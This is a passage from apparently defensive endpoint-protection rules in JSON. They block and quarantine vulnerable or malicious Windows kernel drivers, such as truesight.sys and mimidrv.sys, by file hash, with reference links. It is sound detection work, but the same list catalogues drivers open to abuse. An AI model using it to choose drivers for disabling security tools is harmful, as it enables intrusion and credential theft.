"references": [], + "type": "hash", + "value": "8fc9a091c3dc6e053e044038f24bbc16028078c0fa40c5be19cbfb3ed81ea16d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cc3ff37-e564-5db1-b054-e0be9e33e07f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461183Z", + "creation_date": "2026-03-23T11:45:30.461186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bd1523a68900b80ed1bccb967643525cca55d4ff4622d0128913690e6bb619e", + "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cd288f8-70ff-560b-ac35-4b100e2a215a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465170Z", + "creation_date": "2026-03-23T11:45:30.465173Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fd43a749b5040ebfafd7cdbd088e27ef44341d121f313515ebde460bf3aaa21", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cd50bf2-4433-5da8-8cc2-19f116b57fbf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808155Z", + "creation_date": "2026-03-23T11:45:31.808158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "355668540e0dd71fe784452303f8e45e27fc4820720eb934ff6851089967dea0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ced8c16-4c62-551e-8e0a-4711dd9d272a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605004Z", + "creation_date": "2026-03-23T11:45:29.605006Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605011Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a943b358313881effa1cfd88c1755901a09596bf0e5423bf79e37b013d3fa534", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cefec22-73e9-5321-b773-3e194a5ae513", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481694Z", + "creation_date": "2026-03-23T11:45:30.481696Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481702Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f46c524b79b9b1eb7efd5275dd1604de94560b52edca70ba4e47037f4b55da47", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d02bffe-47d2-5bc1-b232-1d56f99874eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155859Z", + "creation_date": "2026-03-23T11:45:31.155861Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155867Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5f47ee3e3e18fc5275089a706f1c1a36eaec4a7409c973e988bf1d4a82a69b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d0570c5-89e1-51d0-803e-84ca6f953171", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455583Z", + "creation_date": "2026-03-23T11:45:30.455586Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7125c9831a52d89d3d59fb28043b67fbe0068d69732da006fabb95550d1fa730", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d0733d4-e9d1-5db6-81c1-6133768502e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493469Z", + "creation_date": "2026-03-23T11:45:31.493470Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493476Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "41d956f4ca7b9e152f56279263921e933976ccf68a50d67acb17ebb4d5de13e6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d195ab8-bde3-5581-9bb7-c1b87771c7a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971890Z", + "creation_date": "2026-03-23T11:45:29.971892Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971898Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d0580c20c1ba74cf90d44c82d040f0039542eea96e4bbff3996e6760f457cee", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d1e1c6d-ad40-5731-b19d-56da38105451", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979376Z", + "creation_date": "2026-03-23T11:45:29.979378Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50819a1add4c81c0d53203592d6803f022443440935ff8260ff3b6d5253c0c76", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d22072f-e246-5353-98f4-295da2d365d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610863Z", + "creation_date": "2026-03-23T11:45:29.610865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610888Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f74ffd6916333662900cbecb90aca2d6475a714ce410adf9c5c3264abbe5732c", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] 
[https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d5f732a-c3a1-56c0-ac93-907e27a780ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144164Z", + "creation_date": "2026-03-23T11:45:32.144167Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4421ff85aacbcc36695a018c5c47e884d56d62d7d5b8172bb70384ffc4d6a2e4", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d630ebb-7662-536e-954f-952943480618", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824536Z", + "creation_date": "2026-03-23T11:45:30.824540Z", + "enabled": true, + "block_on_agent": true, 
+ "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebb1ec918e1cfb6f9b3e93f0a60f0db48b7aea59810a4f31cf26ab118cd988d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d63a7aa-64b4-525b-ba91-6f1d4ee8165a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479505Z", + "creation_date": "2026-03-23T11:45:31.479509Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a1caec70d9dad22668bdddbe246c9b30c2ed79477726a361da7701385d4d09b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d65e827-a375-5c6d-bb1f-42dc8ee08c58", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828252Z", + "creation_date": "2026-03-23T11:45:31.828255Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828263Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d67f261038e85da36d146f7c024e10d13fcee24f5d033600791ea63bde0c5a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d759d9d-d434-57fc-b96d-65d0206e6165", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827326Z", + "creation_date": "2026-03-23T11:45:30.827328Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.827334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a38b669c7f300abe26a58a6f4659534807f54ea885f27debcc4daba8cea9ace1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d7a363f-5f96-5f3b-a865-87c6a04a4378", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817268Z", + "creation_date": "2026-03-23T11:45:30.817270Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817276Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "129bfa559bde499f748cffc218f2b7ec4b22ee3114ceae8e386fbbe4e58e4523", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d7e5698-f590-5c82-a080-152bec8d3aae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151003Z", + "creation_date": "2026-03-23T11:45:31.151005Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151010Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58bb0343ba788e72c723014cbea43820b05159be07b903a6c97ee426bdce753f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d86b900-97bc-56ec-8868-e4fdfa13539c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146796Z", + "creation_date": "2026-03-23T11:45:31.146797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146803Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "45c4998d19df334deff602a8596ad512bee00f5e536fb91dc87d5337646a3638", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d89a721-68f1-5bda-9794-721b19291e3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152857Z", + "creation_date": "2026-03-23T11:45:31.152860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152883Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0fa17d520322412e349284f172fa0f13ca4ef58956e00d367fd0bfabe18c2ca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d920d27-cc58-5646-b70e-d907d093ae5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154169Z", + "creation_date": "2026-03-23T11:45:31.154171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c3060d8b89d166ce600f28b9a403a70544adf108b0e2c3e09692c810023e879", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d9854a2-a760-588e-8af2-8c2463967084", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824403Z", + "creation_date": "2026-03-23T11:45:30.824405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e15e71021dc3bc0ccf6a0ad825d004b42feea9cf1c0f3d8510edfa26dce2ee5", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0d9e5653-e538-57b2-aba0-26a0c34f14e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986154Z", + "creation_date": "2026-03-23T11:45:29.986156Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43b7715e38449bf82ad0bb6b11d03da42150c1ee23148c5f396cc4ab1001622d", + "comment": "Vulnerable Kernel Driver (aka directio.sys) [https://www.loldrivers.io/drivers/a2c3f6e9-25a5-4b75-8c6b-ad2d4e155822/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0dbf5b7f-cd7d-5a8a-9f3c-9e6d2901c2b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495604Z", + 
"creation_date": "2026-03-23T11:45:31.495607Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495616Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8461e722353e4ca2ff34fbef078c850c16498ed7a6d7581f20ee421584010f70", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0dc1c543-d24e-5c3f-b42b-1a6bb7c2cbe4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 